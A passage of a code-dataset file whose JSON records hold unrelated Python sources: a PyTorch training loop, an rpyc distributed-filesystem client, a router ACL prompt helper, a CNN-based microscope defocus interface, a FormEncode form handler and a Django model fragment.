+ living_rooms + bedrooms + bathrooms\r\n\r\n# Select validation scenes\r\nkitchens = [f\"FloorPlan{i}\" for i in range(20, 26)]\r\nliving_rooms = [f\"FloorPlan{200 + i}\" for i in range(20, 26)]\r\nbedrooms = [f\"FloorPlan{300 + i}\" for i in range(20, 26)]\r\nbathrooms = [f\"FloorPlan{400 + i}\" for i in range(20, 26)]\r\nval_scenes = kitchens + living_rooms + bedrooms + bathrooms\r\n\r\n# Select testing scenes\r\nkitchens = [f\"FloorPlan{i}\" for i in range(26, 31)]\r\nliving_rooms = [f\"FloorPlan{200 + i}\" for i in range(26, 31)]\r\nbedrooms = [f\"FloorPlan{300 + i}\" for i in range(26, 31)]\r\nbathrooms = [f\"FloorPlan{400 + i}\" for i in range(26, 31)]\r\ntest_scenes = kitchens + living_rooms + bedrooms + bathrooms\r\n\r\n# Create dataset with all scenes dataframes\r\nall_scenes = pd.DataFrame()\r\nfor scene in train_scenes:\r\n with open('preprocessed_dataset2/prep_dataset_{}.pkl'.format(scene), \"rb\") as input_file:\r\n preprocessed_dataframe = pickle.load(input_file)\r\n all_scenes = pd.concat([all_scenes, preprocessed_dataframe], ignore_index=True)\r\n del preprocessed_dataframe\r\n\r\n# Separate target variable from rest of dataframe\r\ntarget = pd.DataFrame(all_scenes.iloc[:, -1])\r\ndataframe = 
all_scenes.drop(columns=all_scenes.columns[-1], axis=1)\r\n\r\n# Load dataset in pytorch\r\ntrain = data_utils.TensorDataset(torch.Tensor(np.array(dataframe)), torch.Tensor(np.array(target)))\r\ntrain_loader = data_utils.DataLoader(train, batch_size=batch_size, shuffle=shuffle)\r\nsize_train = len(train)\r\nprint(target.value_counts())\r\n\r\nprint(\"Training set loaded\")\r\n\r\n# Create dataset with all validation or testing scenes dataframes\r\nall_scenes_test = pd.DataFrame()\r\nfor scene in test_scenes:\r\n with open(\"preprocessed_dataset2/prep_dataset_{}.pkl\".format(scene), \"rb\") as input_file:\r\n preprocessed_dataframe = pickle.load(input_file)\r\n all_scenes_test = pd.concat([all_scenes_test, preprocessed_dataframe], ignore_index=True)\r\n del preprocessed_dataframe\r\n\r\n# Separate target variable from rest of dataframe\r\ntest_target = pd.DataFrame(all_scenes_test.iloc[:, -1])\r\ntest_dataframe = all_scenes_test.drop(columns=all_scenes_test.columns[-1], axis=1)\r\nprint(test_target.value_counts())\r\n\r\n# Load dataset in pytorch\r\ntest = data_utils.TensorDataset(torch.Tensor(np.array(test_dataframe)), torch.Tensor(np.array(test_target)))\r\ntest_loader = data_utils.DataLoader(test, batch_size=batch_size, shuffle=shuffle)\r\nsize_test = len(test)\r\n\r\n# print(test_target.value_counts())\r\nprint(\"Test set loaded\")\r\n\r\n# -------------------------------------------------------------------------------------------------\r\n# Initialize metrics\r\n# -------------------------------------------------------------------------------------------------\r\n\r\n# Initialize metrics with torchmetrics\r\ntrain_accuracy = torchmetrics.Accuracy().to(device)\r\ntrain_precision = torchmetrics.Precision().to(device)\r\ntrain_recall = torchmetrics.Recall().to(device)\r\ntest_accuracy = torchmetrics.Accuracy().to(device)\r\ntest_precision = torchmetrics.Precision().to(device)\r\ntest_recall = torchmetrics.Recall().to(device)\r\n\r\n# -------------------------------------------------------------------------------------------------\r\n# Train network for n epochs\r\n# -------------------------------------------------------------------------------------------------\r\nfor epoch in range(epochs):\r\n\r\n # Switch model to training mode. 
This is necessary for layers like dropout, batchnorm etc\r\n # which behave differently in training and evaluation mode\r\n model.train()\r\n print(\"Training Epoch \", epoch + 1)\r\n\r\n # Reset metrics calculators to prepare for new epoch\r\n running_loss = 0.0\r\n train_accuracy.reset()\r\n train_precision.reset()\r\n train_recall.reset()\r\n\r\n # Train\r\n for i, data in enumerate(train_loader, 0):\r\n # get the inputs; data is a list of [inputs, labels]\r\n inputs, labels = data\r\n inputs = inputs.to(device)\r\n labels = labels.to(device)\r\n\r\n # zero the parameter gradients\r\n optimizer.zero_grad()\r\n\r\n # forward + backward + optimize\r\n outputs = model(inputs)\r\n loss = loss_fn(outputs, labels)\r\n loss.backward()\r\n optimizer.step()\r\n\r\n # Update metrics\r\n train_accuracy.update(outputs, labels.int())\r\n train_precision.update(outputs, labels.int())\r\n train_recall.update(outputs, labels.int())\r\n running_loss += loss.item() * inputs.size(0)\r\n\r\n\r\n\r\n # Add weight graphs to tensorboard\r\n writer.add_graph(model, inputs)\r\n for name, weight in model.named_parameters():\r\n writer.add_histogram(name, weight, epoch)\r\n# writer.add_histogram(f'{name}.grad', weight.grad, epoch)\r\n\r\n # Compute metrics for the current epoch\r\n acc = train_accuracy.compute()\r\n pre = train_precision.compute()\r\n rec = train_recall.compute()\r\n epoch_loss = running_loss / size_train\r\n\r\n # Add values to tensorboard\r\n writer.add_scalar(\"Train/Accuracy\", acc.item(), epoch)\r\n writer.add_scalar(\"Train/Precision\", pre.item(), epoch)\r\n writer.add_scalar(\"Train/Recall\", rec.item(), epoch)\r\n writer.add_scalar(\"Train/Loss\", epoch_loss, epoch)\r\n\r\n # -------------------------------------------------------------------------------------------\r\n # Testing phase\r\n # -------------------------------------------------------------------------------------------\r\n\r\n # Switch model to evaluation mode.\r\n model.eval()\r\n print(\"Testing...\")\r\n\r\n # Reset metrics calculators to prepare for new iteration\r\n running_loss = 0.0\r\n test_accuracy.reset()\r\n test_precision.reset()\r\n test_recall.reset()\r\n\r\n with torch.no_grad():\r\n for data in test_loader:\r\n images, labels = data\r\n images = images.to(device)\r\n labels = labels.to(device)\r\n\r\n size = labels.size(0)\r\n outputs = model(images)\r\n predicted = outputs > 0.5 # tensor of true/false\r\n loss = loss_fn(outputs, labels)\r\n\r\n # Update metrics\r\n test_accuracy.update(outputs, labels.int())\r\n test_precision.update(outputs, labels.int())\r\n test_recall.update(outputs, labels.int())\r\n running_loss += loss.item() * images.size(0)\r\n\r\n # Compute and store metrics in lists for the current iteration\r\n acc = test_accuracy.compute()\r\n pre = test_precision.compute()\r\n rec = test_recall.compute()\r\n epoch_loss = running_loss / size_test\r\n\r\n # Add values to tensorboard\r\n writer.add_scalar(\"Test/Accuracy\", acc.item(), epoch)\r\n writer.add_scalar(\"Test/Precision\", pre.item(), epoch)\r\n writer.add_scalar(\"Test/Recall\", rec.item(), epoch)\r\n writer.add_scalar(\"Test/Loss\", epoch_loss, epoch)\r\n\r\n # Scheduler step\r\n #scheduler.step()\r\n\r\n\r\n\r\n# Record hyper-parameters (with final metrics)\r\nwriter.add_hparams(hparam_dict={\"Learning Rate\": learning_rate, \"Batch Size\": batch_size, \"Shuffle\": shuffle,\r\n \"Num Layers\": n_layers},\r\n metric_dict={\"accuracy\": acc, \"precision\": pre, \"recall\": rec, \"loss\": epoch_loss})\r\n\r\n# Save final model\r\nPATH = 
'./nn/final_nn_ALL.pth'\r\ntorch.save(model.state_dict(), PATH)\r\n\r\n# Close tensorboard\r\nwriter.flush()\r\nwriter.close()\r\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"622148205","text":"import os\nimport uuid ### DO NOT DELETE !!!\nimport rpyc\nimport toml\nfrom model import FileMetaData\n\nRPYC_CONFIG = toml.load(\"config.toml\")[\"rpyc\"]\n\nlocal_cache = {}\n\n\ndef query_from_server(query):\n print(query, end=\"\")\n ans = input()\n if ans == 'y' or ans == 'Y':\n return True\n else:\n return False\n # return True\n\n\ndef send_to_minion(block_uuid, data, minion_ip, minion_port):\n con = rpyc.connect(minion_ip, minion_port, config=RPYC_CONFIG)\n minion = con.root.Minion()\n minion.put(block_uuid, data)\n\n\ndef read_from_minion(block_uuid, minion_ip, minion_port):\n con = rpyc.connect(minion_ip, port=minion_port, config=RPYC_CONFIG)\n minion = con.root.Minion()\n return minion.get(block_uuid)\n\n\ndef get(master, f_name, local_path):\n if f_name in local_cache:\n r_file_table, update, timestamp = master.get_file_table_entry(f_name, local_cache[f_name].time_stamp)\n else:\n r_file_table, update, timestamp = master.get_file_table_entry(f_name)\n if update:\n local_cache[f_name] = FileMetaData(f_name, r_file_table, timestamp)\n file_table = r_file_table\n else:\n file_table = local_cache[f_name].blocks\n\n if not file_table:\n print(\"File not found, please check your input\")\n return\n main_minions = master.get_minions()\n port = master.get_minion_port()\n with open(local_path, 'wb') as f:\n for block in file_table:\n block_uuid, gid = block\n data = read_from_minion(block_uuid, main_minions[gid], port)\n f.write(data)\n master.read_finished(f_name)\n\n\ndef put(master, source, destination):\n if not os.path.isfile(source):\n print(\"The path \\'%s\\' is not a file or does not exist!\" % source)\n return\n if not os.access(source, os.R_OK):\n print(\"Permission denied. You do not have the read access to the \\'%s\\'\" % source)\n return\n size = os.path.getsize(source)\n blocks, timestamp, main_minions = master.write(destination, size, query_from_server)\n local_cache[destination] = FileMetaData(destination, blocks, timestamp)\n block_size = master.get_block_size()\n port = master.get_minion_port()\n with open(source, 'rb') as f:\n for b in blocks:\n data = f.read(block_size)\n block_uuid, gid = b\n send_to_minion(block_uuid, data, main_minions[gid], port)\n master.write_finished(destination)\n\n\ndef delete(master, dest):\n master.delete(dest)\n\n\ndef ls(master):\n file_list = master.get_list()\n if len(file_list) == 0:\n print(\"No file.\")\n return\n for f in file_list:\n print(f)\n\n\ndef print_usage():\n print(\"Usage:\")\n print(\"1. View files in the distributed filesystem:\")\n print(\" Command: ls\")\n print(\"2. Put local file in the distributed filesystem:\")\n print(\" Command: put \")\n print(\"3. Get file from the distributed filesystem:\")\n print(\" Command: get \")\n print(\"4. 
Delete file in the distributed filesystem:\")\n print(\" Command: del \")\n print(\"\\nType \\'exit\\' to exit FinalDFS client.\")\n\n\ndef print_hello():\n print(\"Welcome to FinalDFS Client V1.0!\")\n\n\ndef main():\n MASTER_IP = \"localhost\"\n MASTER_PORT = 2131\n con = rpyc.connect(MASTER_IP, port=MASTER_PORT, config=RPYC_CONFIG)\n print(\"Connected to master@%s:%d.\" % (MASTER_IP, MASTER_PORT))\n master = con.root.Master()\n print_hello()\n print_usage()\n while True:\n print(\">>> \", end=\"\")\n whole_command = input().split(\" \")\n\n main_command = whole_command[0]\n\n if main_command == '':\n continue\n\n if main_command == \"get\":\n if len(whole_command) < 3:\n print(\"** Command: get \")\n continue\n get(master, whole_command[1], whole_command[2])\n elif main_command == \"put\":\n if len(whole_command) < 3:\n print(\"** Command: put \")\n continue\n put(master, whole_command[1], whole_command[2])\n elif main_command == \"del\":\n if len(whole_command) < 2:\n print(\"** Command: del \")\n continue\n delete(master, whole_command[1])\n elif main_command == \"ls\":\n ls(master)\n elif main_command == \"exit\":\n exit(0)\n else:\n print(\"Unrecognized command, please retry.\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"307822312","text":"#pylint: disable=C0301, W0201\nimport Checks\n\nclass General_Questions():\n \"\"\"\n A class of the various questions needed for an ACL. Maybe doesn't need to be a class at all?\n \"\"\"\n\n check = Checks.network_checks()\n valid_input = False\n #Variables of strings used modularly in the below questions. May need to be changed to dicts as we work on multiple types of routers\n POLITE_STRING = \"Please specify a \"\n INVALID_STRING = \" is invalid. Specify a valid \"\n DEVICE_STRINGS = {\n 'general' : 'platform, alcatel (a), cisco (c), or juniper (j): ',\n 'invalid' : 'platform using a, c, or j: '\n }\n NAME_STRINGS = {\n 'descriptor': ' (use _ for spaces): ',\n 'entry' : 'description for this entry, using underscores (_) for spaces and less than 20 characters: ',\n 'filter' : 'description for this filter, using underscores (_) for spaces and less than 20 characters: ',\n 'number' : 'number for this filter: '\n }\n\n PROTOCOL_STRINGS = {\n 'general': 'protocol or [any]: ',\n 'invalid' : 'protocol (tcp, udp, icmp, gre, esp) or [any]: '\n }\n IP_STRINGS = [\n \" IP/CIDR or [any]. You can also provide multiple IP/CIDRs, separated by a comma: \",\n \" IP/CIDR in the form of #.#.#.#/# or [any]. Multiple IP/CIDRs must ALL be correctly formatted, or they will be rejected: \"\n ]\n PORT_STRINGS = [\n \" port or [any]: \",\n \" port between 1-65535 or [any]: \"\n ]\n ACTION_STRINGS = {\n 'general': 'action, forward/[drop]: ',\n 'alcatel' : 'drop',\n 'juniper' : \"reject\"\n }\n NEW_TERM_STRINGS = {\n 'general' : 'Do you need another term? y/[n]: ',\n 'invalid' : 'input, y/[n]: '\n }\n\n\n\n\n #Methods for each type of information we need to query. There is almost certainly a way to combine all of these into one function that requires more inputs, but this is easier for now\n #Each method follows the same general logic: Ask for input, call the appropriate checking function in Checks.network_checks, and ask the user again if the check returns false\n\n\n def q_name(self, kind):\n \"\"\"\n Ask for various types of names. 
Types accepted:\n 'filter', 'entry', 'number'\n \"\"\"\n self.name = input(self.POLITE_STRING + self.NAME_STRINGS[kind])\n\n self.is_true = self.check.space_check(self.name)\n self.length = self.check.length_check(self.name)\n self.valid_input = False\n\n while self.valid_input is False:\n if self.is_true is True and self.length is True:\n return self.name\n else:\n self.name = input(str(self.name) + self.INVALID_STRING + self.NAME_STRINGS[kind])\n # compare the kind key itself, not the prompt text stored in NAME_STRINGS\n if kind == \"number\":\n self.is_true = self.check.service_check(self.name)\n else:\n self.is_true = self.check.space_check(self.name)\n self.length = self.check.length_check(self.name)\n\n def q_ip(self, kind):\n \"\"\"\n Ask for a source or destination ip. Kinds accepted:\n 'source', 'destination'\n \"\"\"\n self.ip_addr = input(self.POLITE_STRING + str(kind) + self.IP_STRINGS[0]) or \"any\"\n self.ip_addr = self.ip_addr.replace(' ', '')\n self.ip_addr = self.ip_addr.split(',')\n self.is_true = self.check.ip_check(self.ip_addr)\n self.valid_input = False\n\n while self.valid_input is False:\n if self.is_true is True:\n return self.ip_addr\n else:\n self.ip_addr = input(str(self.ip_addr) + self.INVALID_STRING + str(kind) + self.IP_STRINGS[1]) or \"any\"\n self.ip_addr = self.ip_addr.replace(' ', '')\n self.ip_addr = self.ip_addr.split(',')\n self.is_true = self.check.ip_check(self.ip_addr)\n\n\n def q_port(self, kind):\n \"\"\"\n Ask for a source or destination port. Kinds accepted:\n 'source', 'destination'\n \"\"\"\n\n self.service = input(self.POLITE_STRING + str(kind) + self.PORT_STRINGS[0]) or \"any\"\n self.service = self.service.replace(' ', '')\n self.service = self.service.split(',')\n self.is_true = self.check.service_check(self.service)\n self.valid_input = False\n\n while self.valid_input is False:\n if self.is_true is True:\n return self.service\n else:\n self.service = input(str(self.service) + self.INVALID_STRING + str(kind) + self.PORT_STRINGS[1]) or \"any\"\n self.is_true = self.check.service_check(self.service)\n\n def q_protocol(self):\n \"\"\"Ask for a protocol. Accepts no arguments\"\"\"\n self.protocol = input(self.POLITE_STRING + self.PROTOCOL_STRINGS['general']) or \"any\"\n self.is_true = self.check.key_word_check(self.protocol, \"protocol\")\n self.valid_input = False\n\n while self.valid_input is False:\n if self.is_true is True:\n return self.protocol\n else:\n self.protocol = input(str(self.protocol) + self.INVALID_STRING + self.PROTOCOL_STRINGS['invalid']) or \"any\"\n self.is_true = self.check.key_word_check(self.protocol, \"protocol\")\n\n\n def q_action(self, kind):\n \"\"\"Ask for an action. Kind currently doesn't matter\"\"\"\n self.action = input(self.POLITE_STRING + str(self.ACTION_STRINGS['general'])) or self.ACTION_STRINGS[kind]\n self.is_true = self.check.key_word_check(self.action, \"action\")\n self.valid_input = False\n\n while self.valid_input is False:\n if self.is_true is True:\n return self.action\n else:\n self.action = input(str(self.action) + self.INVALID_STRING + str(self.ACTION_STRINGS['general'])) or self.ACTION_STRINGS[kind]\n self.is_true = self.check.key_word_check(self.action, \"action\")\n\n def q_new_term(self):\n \"\"\"Ask for a new term. 
Accepts no arguments\"\"\"\n self.new = input(self.POLITE_STRING + self.NEW_TERM_STRINGS['general']) or \"n\"\n self.is_true = self.check.key_word_check(self.new, \"y_or_n\")\n self.valid_input = False\n\n while self.valid_input is False:\n if self.is_true is True:\n return self.new\n else:\n self.new = input(str(self.new) + self.INVALID_STRING + str(self.NEW_TERM_STRINGS['invalid'])) or \"n\"\n self.is_true = self.check.key_word_check(self.new, \"y_or_n\")\n\n def q_device(self):\n \"\"\"Ask for the type of device. Used to determine the use of Alcatel, Cisco, or Juniper\"\"\"\n self.device = input(self.POLITE_STRING + self.DEVICE_STRINGS['general'])\n self.is_true = self.check.key_word_check(self.device, \"device\")\n self.valid_input = False\n\n while self.valid_input is False:\n if self.is_true is True:\n return self.device\n else:\n self.device = input(str(self.device) + self.INVALID_STRING + str(self.DEVICE_STRINGS['invalid']))\n self.is_true = self.check.key_word_check(self.device, \"device\")\n","sub_path":"General_Qs.py","file_name":"General_Qs.py","file_ext":"py","file_size_in_byte":7160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"470699994","text":"import numpy as np\nimport sys\nsys.path.insert(1, '/home/chenyu/Desktop/Bayesian-optimization-using-Gaussian_Process/GPTrelated/')\nfrom uscope_calc import sim\nimport matplotlib.pyplot as plt\nimport os\nimport time\n# CNN related libraries\nfrom keras import applications, optimizers, callbacks\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Dropout, Flatten, Dense\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import EarlyStopping\nimport tensorflow as tf\n\nclass machine_interface:\n def __init__(self, dev_ids, start_point = None, CNNpath = '', lens = []):\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" # specify which GPU to use\n self.pvs = np.array(dev_ids)\n self.name = 'Defocus'\n # load the current for the rest lenses, in the order of H1, dH, S6, S7, S3, S4, all are normalzied values\n self.lens = lens\n\n if type(start_point) == type(None):\n current_x = np.zeros(len(self.pvs)) #replace with expression that reads current ctrl pv values (x) from machine\n self.setX(current_x)\n else: \n self.setX(start_point)\n # replace with CNN path later\n self.DefocusModel = self.loadCNN('CNNmodels/VGG16_defocus_test14.h5')\n\n def loadCNN(self, path):\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\n model = applications.VGG16(weights=None, include_top=False, input_shape=(128, 128, 3))\n print('Model loaded')\n top_model = Sequential()\n top_model.add(Flatten(input_shape=model.output_shape[1:]))\n top_model.add(Dense(256, activation='relu'))\n top_model.add(Dropout(0.0))\n top_model.add(Dense(1,activation=None))\n new_model = Sequential()\n\n for l in model.layers:\n new_model.add(l)\n\n new_model.add(top_model)\n new_model.load_weights(path)\n return new_model\n\n def scale_range(self, input, min, max):\n input += -(np.min(input))\n input /= np.max(input) / (max - min)\n input += min\n return input\n\n def aperture_generator(self, px_size, simdim, ap_size):\n x = np.linspace(-simdim, simdim, px_size)\n y = np.linspace(-simdim, simdim, px_size)\n xv, yv = np.meshgrid(x, y)\n apt_mask = mask = np.sqrt(xv*xv + yv*yv) < ap_size # aperture mask\n return apt_mask\n\n def setLens(self, lens_new):\n self.lens = np.array(lens_new, ndmin=1)\n\n def setX(self, x_new):\n self.x = np.array(x_new, ndmin=1)\n # add expressions to set 
machine ctrl pvs to the position called self.x -- Note: self.x is a 2-dimensional array of shape (1, ndim). To get the values as a 1d-array, use self.x[0]\n\n def getDefocus(self):\n ASCIIFILE = '/home/chenyu/Desktop/Bayesian-optimization-using-Gaussian_Process/outscope.txt'\n PNGFILE = '/home/chenyu/Desktop/Bayesian-optimization-using-Gaussian-Process/ronchigram.npy'\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\n MConHBAR = 2.59e12\n maxsig = 1 # determine how many standard deviations are we going to plot\n\n x_list = []\n # normalize then divided by 2 to match the contrast of Matlab simulated Ronchigrams\n # frame = self.scale_range(shadow, 0, 1) / 2 * self.aperture_generator(128, 40, 40)\n frame = np.load(PNGFILE)\n frame = self.scale_range(frame, 0, 1)\n new_channel = np.zeros(frame.shape)\n img_stack = np.dstack((frame, new_channel, new_channel))\n x_list.append(img_stack)\n x_list = np.concatenate([arr[np.newaxis] for arr in x_list])\n prediction = self.DefocusModel.predict(x_list, batch_size = 1)\n # print(prediction)\n defocus = 1 - prediction[0][0]\n print('Estimating defocus...')\n del x_list, img_stack, frame, prediction\n return defocus\n\n\n def getState(self): \n ASCIIFILE = '/home/chenyu/Desktop/Bayesian-optimization-using-Gaussian-Process/outscope.txt'\n PNGFILE = '/home/chenyu/Desktop/Bayesian-optimization-using-Gaussian-Process/ronchigram.npy'\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\n MConHBAR = 2.59e12\n maxsig = 1 # determine how many standard deviations are we going to plot\n\n # Same high and low range, the 4th element for defocus is not used.\n x_low = np.asarray([1000, -40, 387000, -685000, -3.7515e6, 119000, 640000])\n x_high = np.asarray([2800, 40, 393000, -622500, -3.7495e6, 120300, 651000])\n\n xlim, ylim, shadow = sim(\n alpha = 1.0e-4*5,\n S1 = 2.5e5,\n S2 = 2.44e5 + self.x[0][0] * 0.06e5,\n H1 = self.lens[0][0] * (x_high[0] - x_low[0]) + x_low[0],\n H2 = self.lens[0][0] * (x_high[0] - x_low[0]) + x_low[0] + self.lens[0][1] * (x_high[1] - x_low[1]) + x_low[1],\n S3 = self.lens[0][4]* (x_high[5] - x_low[5]) + x_low[5], #119931.5,\n S4 = self.lens[0][5]* (x_high[6] - x_low[6]) + x_low[6], #648691.415,\n S6 = self.lens[0][2]* (x_high[2] - x_low[2]) + x_low[2], #390000,\n S7 = self.lens[0][3]* (x_high[3] - x_low[3]) + x_low[3], #-654100.0\n Obj = -3.7505e6,\n\n # Option 2: control S7 to change defocus\n # alpha = 1.0e-4*5,\n # S1 = 2.5e5,\n # S2 = 2.5e5,\n # H1 = self.lens[0][0] * (x_high[0] - x_low[0]) + x_low[0],\n # H2 = self.lens[0][0] * (x_high[0] - x_low[0]) + x_low[0] + self.lens[0][1] * (x_high[1] - x_low[1]) + x_low[1],\n # S3 = self.lens[0][4]* (x_high[5] - x_low[5]) + x_low[5], #119931.5,\n # S4 = self.lens[0][5]* (x_high[6] - x_low[6]) + x_low[6], #648691.415,\n # S6 = self.lens[0][2]* (x_high[2] - x_low[2]) + x_low[2], #390000,\n # S7 = self.x[0][0]* (x_high[3] - x_low[3]) + x_low[3], #-654100.0\n # Obj = -3.7505e6,\n\n ) # the parameters that are not given an value here would be set to the default values, which could be found in uscope.py\n # the sim function would return the Ronchigram, and save the outscope.txt file to the path that was calling this function\n # i.e. 
the path of the Jupyte Notebook\n\n\n # Get defocus from CNN model using the shadow returned by GPT\n x_list = []\n # normalize then divided by 2 to match the contrast of Matlab simulated Ronchigrams\n # frame = self.scale_range(shadow, 0, 1) / 2 * self.aperture_generator(128, 40, 40)\n frame = self.scale_range(shadow, 0, 1)\n new_channel = np.zeros(frame.shape)\n img_stack = np.dstack((frame, new_channel, new_channel))\n x_list.append(img_stack)\n x_list = np.concatenate([arr[np.newaxis] for arr in x_list])\n prediction = self.DefocusModel.predict(x_list, batch_size = 1)\n # print(prediction)\n objective_state = 1 - prediction[0][0]\n print('Predicting defocus...')\n del x_list, img_stack, frame, prediction\n\n # The rest is the same for two different emittance calculation methods\n print('saving ronchigram...')\n np.save('ronchigram.npy', shadow)\n\n return np.array(self.x, ndmin = 2), np.array([[objective_state]])\n \n \n","sub_path":"machine_interfaces/machine_interface_Defocus.py","file_name":"machine_interface_Defocus.py","file_ext":"py","file_size_in_byte":7275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"345715174","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/formprocess/handler.py\n# Compiled at: 2012-02-09 02:39:36\n\"\"\" Generic web form handler class and associates. \"\"\"\nimport logging\nfrom formencode import Invalid\nfrom formencode.variabledecode import variable_decode, variable_encode\nfrom webob.multidict import MultiDict\nfrom webhelpers.containers import DumbObject\nlog = logging.getLogger(__name__)\n\nclass FormHandler(object):\n \"\"\" Base form handler. \"\"\"\n use_variable_encode = False\n use_variable_decode = False\n schema = None\n\n def __init__(self, schema=None, use_variable_encode=None, use_variable_decode=None, update_defaults_hooks=None, get_schema_hook=None, update_state_hooks=None, on_process_error_hooks=None, defaults_filter_hooks=None, customize_fill_kwargs_hooks=None):\n \"\"\"\n :param schema: This is used if there is no get_schema hook.\n :param use_variable_encode: Encode the defaults and errors using\n formencode's variable_encode.\n :param use_variable_decode: Decode the defaults using\n formencode's variable_decode.\n :param update_defaults_hooks: Add more defaults to the initial\n defaults.\n :param update_state_hooks: Called to add in more attributes onto\n the state.\n :param on_process_error_hooks: Called when an error occurs while\n processing the form submission.\n :param defaults_filter_hooks: Call to pre-filter the defaults\n before they are processed regardless of error or success.\n :param customize_fill_kwargs_hooks: This function is called during\n build_form_dict so that the developer can customize the\n fill_kwargs.\n :param get_schema_hook: This function is called to get the schema\n for processing the defaults. 
There can *only* be one.\n \"\"\"\n if schema is not None:\n self.schema = schema\n if use_variable_encode is not None:\n self.use_variable_encode = use_variable_encode\n if use_variable_decode is not None:\n self.use_variable_decode = use_variable_decode\n self.hooks = {'update_defaults': [], 'update_state': [], 'on_process_error': [], 'defaults_filter': [], 'customize_fill_kwargs': [], 'get_schema': None}\n if update_defaults_hooks:\n self.hooks['update_defaults'].extend(update_defaults_hooks)\n if update_state_hooks:\n self.hooks['update_state'].extend(update_state_hooks)\n if on_process_error_hooks:\n self.hooks['on_process_error'].extend(on_process_error_hooks)\n if defaults_filter_hooks:\n self.hooks['defaults_filter'].extend(defaults_filter_hooks)\n if customize_fill_kwargs_hooks:\n self.hooks['customize_fill_kwargs'].extend(customize_fill_kwargs_hooks)\n if get_schema_hook:\n self.hooks['get_schema'] = get_schema_hook\n return\n\n def have_defaults(self, form_dict):\n \"\"\" Use this to determine if the defaults have been fetched yet. \"\"\"\n return 'defaults' in form_dict and form_dict['defaults'] is not None\n\n def was_success(self, form_dict):\n \"\"\" Use this when end_process returns the form_dict. \"\"\"\n return not bool(form_dict['errors'])\n\n def get_schema(self, unsafe_params, state):\n \"\"\"\n This method allows the developer to choose a schema at request time\n based on the submission.\n \"\"\"\n if self.hooks['get_schema']:\n schema = self.hooks['get_schema'](self, unsafe_params, state)\n else:\n assert self.schema\n schema = self.schema\n return schema\n\n def _make_state(self, defaults, state_attrs):\n \"\"\" Makes a state object and returns it. \"\"\"\n state = DumbObject(**state_attrs)\n for update_state in self.hooks['update_state']:\n update_state(self, defaults, state)\n\n return state\n\n def _prompt_defaults(self, state):\n \"\"\" Only called when no defaults are given to prompt(). \"\"\"\n return MultiDict()\n\n def prompt(self, defaults=None, **state_attrs):\n \"\"\" Send the form to the user for the first time. \"\"\"\n state = self._make_state(defaults, state_attrs)\n if defaults is None:\n defaults = self._prompt_defaults(state)\n for update_defaults in self.hooks['update_defaults']:\n defaults = update_defaults(self, defaults, state)\n\n if self.use_variable_encode and defaults:\n defaults = variable_encode(defaults)\n return self.build_form_dict(defaults=defaults, state=state)\n\n def process(self, unsafe_params, **state_attrs):\n \"\"\" Processes a form submission. \"\"\"\n state = self._make_state(unsafe_params, state_attrs)\n for defaults_filter in self.hooks['defaults_filter']:\n unsafe_params = defaults_filter(self, unsafe_params, state)\n\n if self.use_variable_decode:\n unsafe_params = variable_decode(unsafe_params)\n schema = self.get_schema(unsafe_params, state)\n try:\n defaults = schema.to_python(unsafe_params, state=state)\n except Invalid as e:\n return self._process_invalid(e, state=state)\n\n form_dict = dict(defaults=defaults, errors=None, state=state)\n if not self.was_success(form_dict):\n return form_dict\n else:\n defaults, state = form_dict['defaults'], form_dict['state']\n try:\n return self.end_process(defaults, state)\n except Invalid as e:\n return self._process_invalid(e, state=state)\n\n return\n\n def _process_invalid(self, e, state=None):\n \"\"\" Process an Invalid exception. 
\"\"\"\n errors = e.unpack_errors(encode_variables=self.use_variable_encode)\n if self.use_variable_encode:\n defaults = variable_encode(e.value)\n else:\n defaults = e.value\n for on_process_error in self.hooks['on_process_error']:\n defaults, errors = on_process_error(self, defaults, errors, state)\n\n return self.build_form_dict(defaults=defaults, errors=errors, state=state)\n\n def build_form_dict(self, defaults=None, errors=None, state=None):\n \"\"\" Build fill_kwargs with customizations and return render vars. \"\"\"\n fill_kwargs = {}\n fill_kwargs['defaults'] = defaults\n fill_kwargs['errors'] = errors\n for customize_fill_kwargs in self.hooks['customize_fill_kwargs']:\n fill_kwargs = customize_fill_kwargs(self, defaults, errors, state, fill_kwargs)\n\n return self.end_build_form_dict(defaults, errors, state, fill_kwargs)\n\n def end_build_form_dict(self, defaults, errors, state, fill_kwargs):\n \"\"\" Assemble the variables to be returned by prompt and process. \"\"\"\n form_dict = {'defaults': defaults, \n 'errors': errors, \n 'state': state, \n 'fill_kwargs': fill_kwargs}\n return form_dict\n\n def end_process(self, defaults, state):\n \"\"\" Leave this as-is if you want to handler success/error inside\n caller of process(). \"\"\"\n return self.build_form_dict(defaults=defaults, errors={}, state=state)","sub_path":"pycfiles/formprocess-0.4.3-py2.7/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":7470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"351014710","text":"from notification.models import Notification\nfrom django.contrib.contenttypes.fields import GenericRelation\nfrom django.db import models\nfrom django.conf import settings\nfrom django.db.models.expressions import Value\nfrom django.utils import timezone\nfrom account.models import Account\nfrom django.contrib import admin\nfrom django.db.models.signals import post_save, post_delete\n# Create your models here.\n\n\nclass Question(models.Model):\n title = models.CharField(max_length=30)\n question = models.CharField(max_length=300)\n auth = models.ForeignKey(\n Account, on_delete=models.CASCADE, related_name='owner', blank=True)\n like = models.ManyToManyField(\n Account, related_name=\"question_like\", default=0, blank=True)\n 